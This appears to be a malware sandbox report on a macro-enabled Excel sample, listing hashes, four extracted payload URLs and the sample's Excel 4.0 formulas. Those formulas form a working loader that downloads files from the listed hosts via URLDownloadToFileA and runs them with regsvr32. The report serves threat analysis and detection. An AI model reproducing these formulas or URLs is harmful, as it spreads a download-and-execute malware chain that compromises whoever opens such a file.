Behavioral task
behavioral1
Sample
Untitled 81764.xlsm
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Untitled 81764.xlsm
Resource
win10v2004-20221111-en
General
-
Target
Untitled 81764.xlsm
-
Size
228KB
-
MD5
0be38d7e3fe5fc3a79a597ed1d254a50
-
SHA1
f4eb84f6b1297f57e57780aa7fcabe6438880d40
-
SHA256
da644b867f32f4c76681fd2a7838d843f447f06f87a5ea98786031f0caf169cc
-
SHA512
e589d28f3394e198fd8cebf453952973c6967922b171d4f997499d78dd297ee62567418ce621b84848aa1d9d7e4258bd12b287de198a456b70450775b94f81b2
-
SSDEEP
6144:9w2WMrfxxjhBMMrxBRXZ5Dz3M1qa8L4cyO:9w2LDHf9PH5XUqRLTyO
Malware Config
Extracted
httph.com/nutabalong/CfyFMHWntM3t/
https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/
http://bet-invest.com/mail/nui/
https://www.manchesterot.co.uk/about-us/KEfGo/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"httph.com/nutabalong/CfyFMHWntM3t/","..\oxnv1.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/","..\oxnv2.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bet-invest.com/mail/nui/","..\oxnv3.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/KEfGo/","..\oxnv4.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx") =RETURN()
Signatures
Files
-
Untitled 81764.xlsm.xlsm office2007